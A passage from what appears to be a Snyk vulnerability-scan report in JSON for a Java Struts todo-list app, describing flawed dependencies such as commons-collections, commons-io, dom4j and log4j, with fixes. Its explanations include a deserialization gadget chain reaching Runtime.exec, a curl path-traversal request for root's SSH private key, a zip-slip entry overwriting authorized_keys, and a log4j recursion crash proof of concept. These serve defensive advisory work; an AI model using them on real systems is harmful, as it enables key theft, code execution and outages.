3.2.2 onwards will throw an `UnsupportedOperationException` error when attempts are made to deserialize InvokerTransformer instances to prevent potential remote code execution exploits.\r\n\r\n*Note:* `org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4` we recommend moving to the new artifact if possible.\r\n\r\n# PoC \r\n\r\n```\r\n/*\r\n\tGadget chain:\r\n\t\tObjectInputStream.readObject()\r\n\t\t\tAnnotationInvocationHandler.readObject()\r\n\t\t\t\tMap(Proxy).entrySet()\r\n\t\t\t\t\tAnnotationInvocationHandler.invoke()\r\n\t\t\t\t\t\tLazyMap.get()\r\n\t\t\t\t\t\t\tChainedTransformer.transform()\r\n\t\t\t\t\t\t\t\tConstantTransformer.transform()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tClass.getMethod()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.getRuntime()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.exec()\r\n\tRequires:\r\n\t\tcommons-collections\r\n */\r\n```\n\n# Details\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\r\n\r\n \r\n\r\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\r\n\r\n \r\n\r\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\r\n\r\n \r\n\r\nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\r\n\r\n \r\n\r\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\r\n\r\n- Apache Blog\r\n\r\n \r\n\r\nThe vulnerability, also know as _Mad Gadget_\r\n\r\n> Mad Gadget is one of the most pernicious vulnerabilities we’ve seen. By merely existing on the Java classpath, seven “gadget” classes in Apache Commons Collections (versions 3.0, 3.1, 3.2, 3.2.1, and 4.0) make object deserialization for the entire JVM process Turing complete with an exec function. Since many business applications use object deserialization to send messages across the network, it would be like hiring a bank teller who was trained to hand over all the money in the vault if asked to do so politely, and then entrusting that teller with the key. The only thing that would keep a bank safe in such a circumstance is that most people wouldn’t consider asking such a question.\r\n\r\n- Google\n\n\n# Remediation\n\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n\n\n# References\n\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee)\n\n- [GitHub PR](https://github.com/apache/commons-collections/pull/18)\n\n- [Jira Ticket](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 5.6, + "security-severity": "5.6" + } + }, + { + "id": "SNYK-JAVA-COMMONSFILEUPLOAD-30082", + "shortDescription": { + "text": "High severity - Denial of Service (DoS) vulnerability in commons-fileupload:commons-fileupload" + }, + "fullDescription": { + "text": "(CVE-2016-3092) commons-fileupload:commons-fileupload@1.3.1" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: commons-fileupload:commons-fileupload\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.apache.struts:struts2-core@2.3.20 and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20 › commons-fileupload:commons-fileupload@1.3.1\n# Overview\n[commons-fileupload:commons-fileupload](https://mvnrepository.com/artifact/commons-fileupload/commons-fileupload) is a component that provides a simple yet flexible means of adding support for multipart file upload functionality to servlets and web applications.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). It allows remote attackers to cause a denial of service (CPU consumption) via a long boundary string.\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nUpgrade `commons-fileupload:commons-fileupload` to version 1.3.2 or higher.\n# References\n- [Apache Mail Archive](http://mail-archives.us.apache.org/mod_mbox/www-announce/201606.mbox/%3C6223ece6-2b41-ef4f-22f9-d3481e492832@apache.org%3E)\n- [Apache-SVN](http://svn.apache.org/viewvc/commons/proper/fileupload/trunk/RELEASE-NOTES.txt?r1=1745717&r2=1749637&diff_format=h)\n- [CVE Details](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3092)\n- [Github ChangeLog](https://github.com/apache/commons-fileupload/blob/b1498c9877d751f8bc4635a6f252ebdfcba28518/src/changes/changes.xml#L84)\n- [GitHub Commit](https://github.com/apache/tomcat80/commit/d752a415a875e888d8c8d0988dfbde95c2c6fb1d)\n- [GitHub Commit](https://github.com/apache/tomcat/commit/2c3553f3681baf775c50bb0b49ea61cb44ea914f)\n- [GitHub Commit](https://github.com/apache/tomcat/commit/8999f8243197a5f8297d0cb1a0d86ed175678a77)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1349475)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-20", + "maven" + ], + "cvssv3_baseScore": 7.5, + "security-severity": "7.5" + } + }, + { + "id": "SNYK-JAVA-COMMONSFILEUPLOAD-31540", + "shortDescription": { + "text": "Medium severity - Information Exposure vulnerability in commons-fileupload:commons-fileupload" + }, + "fullDescription": { + "text": "commons-fileupload:commons-fileupload@1.3.1" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: commons-fileupload:commons-fileupload\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.apache.struts:struts2-core@2.3.20 and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20 › commons-fileupload:commons-fileupload@1.3.1\n# Overview\r\n[`commons-fileupload:commons-fileupload`](https://commons.apache.org/proper/commons-fileupload/) provides a simple yet flexible means of adding support for multipart file upload functionality to servlets and web applications.\r\n\r\nAffected versions of the package are vulnerable to Information Disclosure because the `InputStream` is not closed on exception.\r\n\r\n# Remediation\r\nUpgrade `commons-fileupload` to version 1.3.2 or higher.\r\n\r\n# References\r\n- [Github ChangeLog](https://github.com/apache/commons-fileupload/blob/master/src/changes/changes.xml#L56)\r\n- [Github Commit](https://github.com/apache/commons-fileupload/commit/5b4881d7f75f439326f54fa554a9ca7de6d60814)" + }, + "properties": { + "tags": [ + "security", + "CWE-200", + "maven" + ], + "cvssv3_baseScore": 6.5, + "security-severity": "6.5" + } + }, + { + "id": "SNYK-JAVA-COMMONSFILEUPLOAD-3326457", + "shortDescription": { + "text": "Medium severity - Denial of Service (DoS) vulnerability in commons-fileupload:commons-fileupload" + }, + "fullDescription": { + "text": "(CVE-2023-24998) commons-fileupload:commons-fileupload@1.3.1" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: commons-fileupload:commons-fileupload\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.apache.struts:struts2-core@2.3.20 and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20 › commons-fileupload:commons-fileupload@1.3.1\n# Overview\n[commons-fileupload:commons-fileupload](https://mvnrepository.com/artifact/commons-fileupload/commons-fileupload) is a component that provides a simple yet flexible means of adding support for multipart file upload functionality to servlets and web applications.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) when an attacker sends a large number of request parts in a series of uploads or a single multipart upload.\r\n\r\n**NOTE:** After upgrading to the fixed version, the `setFileCountMax()` must be explicitly set to avoid this vulnerability.\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nUpgrade `commons-fileupload:commons-fileupload` to version 1.5 or higher.\n# References\n- [Apache Mailing List](https://lists.apache.org/thread/4xl4l09mhwg4vgsk7dxqogcjrobrrdoy)\n- [GitHub Commit](https://github.com/apache/commons-fileupload/commit/0a306f75949f2e9f5f92c400cad39d20117a2eb0)\n- [GitHub Commit](https://github.com/apache/commons-fileupload/commit/e20c04990f7420ca917e96a84cec58b13a1b3d17)\n- [GitHub Commit (Tomcat)](https://github.com/apache/tomcat/commit/063e2e81ede50c287f737cc8e2915ce7217e886e)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-400", + "maven" + ], + "cvssv3_baseScore": 6.5, + "security-severity": "6.5" + } + }, + { + "id": "SNYK-JAVA-COMMONSIO-1277109", + "shortDescription": { + "text": "Medium severity - Directory Traversal vulnerability in commons-io:commons-io" + }, + "fullDescription": { + "text": "(CVE-2021-29425) commons-io:commons-io@2.2" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: commons-io:commons-io\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.apache.struts:struts2-core@2.3.20 and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20 › commons-io:commons-io@2.2\n# Overview\n[commons-io:commons-io](https://search.maven.org/artifact/commons-io/commons-io) is a The Apache Commons IO library contains utility classes, stream implementations, file filters, file comparators, endian transformation classes, and much more.\n\nAffected versions of this package are vulnerable to Directory Traversal via calling the method FileNameUtils.normalize using an improper string like `//../foo` or `\\\\..\\foo`, which may allow access to files in the parent directory.\n\n# Details\n\nA Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with \"dot-dot-slash (../)\" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.\n\nDirectory Traversal vulnerabilities can be generally divided into two types:\n\n- **Information Disclosure**: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.\n\n`st` is a module for serving static files on web pages, and contains a [vulnerability of this type](https://snyk.io/vuln/npm:st:20140206). In our example, we will serve files from the `public` route.\n\nIf an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.\n\n```\ncurl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa\n```\n**Note** `%2e` is the URL encoded version of `.` (dot).\n\n- **Writing arbitrary files**: Allows the attacker to create or replace existing files. This type of vulnerability is also known as `Zip-Slip`. \n\nOne way to achieve this is by using a malicious `zip` archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\n\nThe following is an example of a `zip` archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\n\n```\n2018-04-15 22:04:29 ..... 19 19 good.txt\n2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys\n```\n\n# Remediation\nUpgrade `commons-io:commons-io` to version 2.7 or higher.\n# References\n- [GitHub Commit](https://github.com/apache/commons-io/commit/fe7543eee5cd4b2f9e78aa44c31031b68eba204d)\n- [Jira Issue](https://issues.apache.org/jira/browse/IO-556)\n- [PoC](https://github.com/AlAIAL90/CVE-2021-29425)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-20", + "CWE-22", + "maven" + ], + "cvssv3_baseScore": 5.3, + "security-severity": "5.3" + } + }, + { + "id": "SNYK-JAVA-DOM4J-174153", + "shortDescription": { + "text": "High severity - XML External Entity (XXE) Injection vulnerability in dom4j:dom4j" + }, + "fullDescription": { + "text": "(CVE-2018-1000632) dom4j:dom4j@1.6.1" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: dom4j:dom4j\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › io.github.snyk:todolist-core@0.0.1-SNAPSHOT › org.hibernate:hibernate-core@4.3.7.Final › dom4j:dom4j@1.6.1\n# Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection due to improper validation of the `QName` inputs.\n\n# Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n# Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n# References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387)\n- [GitHub Issue](https://github.com/dom4j/dom4j/issues/48)\n- [POC: Ihacktoprotect Blog](https://ihacktoprotect.com/post/dom4j-xml-injection/)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-611", + "maven" + ], + "cvssv3_baseScore": 7.5, + "security-severity": "7.5" + } + }, + { + "id": "SNYK-JAVA-DOM4J-2812975", + "shortDescription": { + "text": "High severity - XML External Entity (XXE) Injection vulnerability in dom4j:dom4j" + }, + "fullDescription": { + "text": "(CVE-2020-10683) dom4j:dom4j@1.6.1" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: dom4j:dom4j\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › io.github.snyk:todolist-core@0.0.1-SNAPSHOT › org.hibernate:hibernate-core@4.3.7.Final › dom4j:dom4j@1.6.1\n# Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. By using the default `SaxReader()` provided by Dom4J, external DTDs and External Entities are allowed, resulting in a possible XXE.\n\n# Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n# Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n# References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/a822852)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1694235)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-611", + "maven" + ], + "cvssv3_baseScore": 7.4, + "security-severity": "7.4" + } + }, + { + "id": "SNYK-JAVA-JAVAXSERVLET-30449", + "shortDescription": { + "text": "High severity - XML External Entity (XXE) Injection vulnerability in javax.servlet:jstl" + }, + "fullDescription": { + "text": "(CVE-2015-0254) javax.servlet:jstl@1.2" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: javax.servlet:jstl\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › javax.servlet:jstl@1.2\n# Overview\n[javax.servlet:jstl](https://mvnrepository.com/artifact/javax.servlet/jstl) is a collection of useful JSP tags which encapsulates the core functionality common to many JSP applications.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. Apache Standard Taglibs before 1.2.3 allows remote attackers to execute arbitrary code or conduct external XML entity (XXE) attacks via a crafted XSLT extension in a `` or `` JSTL XML tag.\n\n# Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n# Remediation\nThere is no fixed version for `javax.servlet:jstl`.\n\n# References\n- [Apache Mail Archive](http://mail-archives.us.apache.org/mod_mbox/www-announce/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A@apache.org%3E)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0254)\n- [RedHat CVE Database](https://access.redhat.com/security/cve/CVE-2015-0254)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-94", + "maven" + ], + "cvssv3_baseScore": 7.3, + "security-severity": "7.3" + } + }, + { + "id": "SNYK-JAVA-OGNL-30474", + "shortDescription": { + "text": "Medium severity - Denial of Service (DoS) vulnerability in ognl:ognl" + }, + "fullDescription": { + "text": "(CVE-2016-3093) ognl:ognl@3.0.6" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: ognl:ognl\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, org.apache.struts:struts2-core@2.3.20 and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.struts:struts2-core@2.3.20 › ognl:ognl@3.0.6\n# Overview\n[`ognl:ognl`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22ognl%22) is a simple Expression Language (EL) for Java.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) attacks.\nApache Struts 2.0.0 through 2.3.24.1 does not properly cache method references when used with OGNL before 3.0.12, which allows remote attackers to cause a denial of service (block access to a web site) via unspecified vectors.\n\n# Details\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\r\n\r\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\r\n\r\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\r\n\r\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\r\n\r\nTwo common types of DoS vulnerabilities:\r\n\r\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\r\n\r\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](npm:ws:20171108)\n\n# Remediation\nUpgrade `ognl:ognl` to version 3.0.12 or higher.\n\n# References\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3093)\n- [GitHub Commit](https://github.com/jkuhnert/ognl/commit/ae43073fbf38db8371ff4f8bf2a966ee3b5f7e92)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-20", + "maven" + ], + "cvssv3_baseScore": 5.3, + "security-severity": "5.3" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524", + "shortDescription": { + "text": "High severity - Denial of Service (DoS) vulnerability in org.apache.logging.log4j:log4j-core" + }, + "fullDescription": { + "text": "(CVE-2021-45105) org.apache.logging.log4j:log4j-core@2.7" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.logging.log4j:log4j-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.apache.logging.log4j:log4j-core@2.7\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.logging.log4j:log4j-core@2.7\n# Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). Does not protect against uncontrolled recursion from self-referential lookups. \r\n\r\nWhen the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, `$${ctx:loginId}`), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a `StackOverflowError` that will terminate the process.\r\n\r\n## PoC\r\n\r\nIn `log4j.properties`:\r\n```java\r\nappender.console.type = Console\r\nappender.console.name = console\r\nappender.console.layout.type = PatternLayout\r\nappender.console.layout.pattern = !${ctx:test}! %m%n\r\nrootLogger.level = ALL\r\nrootLogger.appenderRef.file.ref = console\r\n```\r\n\r\nIn `Main.java`:\r\n```java\r\nThreadContext.put(\"test\", \"${::-${ctx:test}}\");\r\nlogger.error(\"boom\"); // Will not be logged\r\n```\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.3, 2.17.0 or higher.\n# References\n- [Apache Security](https://logging.apache.org/log4j/2.x/security.html)\n- [JIRA Issue](https://issues.apache.org/jira/browse/LOG4J2-3230)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-400", + "maven" + ], + "cvssv3_baseScore": 7.5, + "security-severity": "7.5" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339", + "shortDescription": { + "text": "Medium severity - Arbitrary Code Execution vulnerability in org.apache.logging.log4j:log4j-core" + }, + "fullDescription": { + "text": "(CVE-2021-44832) org.apache.logging.log4j:log4j-core@2.7" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.logging.log4j:log4j-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.apache.logging.log4j:log4j-core@2.7\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.logging.log4j:log4j-core@2.7\n# Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution.
**Note:** Even though this vulnerability appears to be related to the [log4Shell vulnerability](https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720), this vulnerability requires an attacker to have access to modify configurations to be exploitable, which is rarely possible.\r\n\r\nAn attacker with access to modification of logging configuration is able to configure `JDBCAppender` with a data source referencing a JNDI URI - which can execute malicious code.\r\n\r\nIn the fixed versions, `JDBCAppender` is using `JndiManager` and disables JNDI lookups by default (via `log4j2.enableJndiJdbc=false`).\r\n\r\n# Alternative Remediation\r\nIf you have reason to believe your application may be vulnerable and upgrading is not an option, you can either:\r\n\r\n* Disable/remove `JDBCAppender`\r\n* If `JDBCAppender` is used, make sure that it is not configured to use any protocol other than Java\n# Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.2, 2.12.4, 2.17.1 or higher.\n# References\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [GitHub Commit](https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16)\n- [Jira Issue](https://issues.apache.org/jira/browse/LOG4J2-3293)\n- [Openwall Mail](https://www.openwall.com/lists/oss-security/2021/12/28/1)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-94", + "maven" + ], + "cvssv3_baseScore": 6.6, + "security-severity": "6.6" + } + }, + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-567761", + "shortDescription": { + "text": "Low severity - Man-in-the-Middle (MitM) vulnerability in org.apache.logging.log4j:log4j-core" + }, + "fullDescription": { + "text": "(CVE-2020-9488) org.apache.logging.log4j:log4j-core@2.7" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.logging.log4j:log4j-core\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT and org.apache.logging.log4j:log4j-core@2.7\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › org.apache.logging.log4j:log4j-core@2.7\n# Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Man-in-the-Middle (MitM). Improper validation of certificate with host mismatch in Apache Log4j SMTP appender. This could allow an SMTPS connection to be intercepted by a man-in-the-middle attack which could leak any log messages sent through that appender.\n# Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.13.2 or 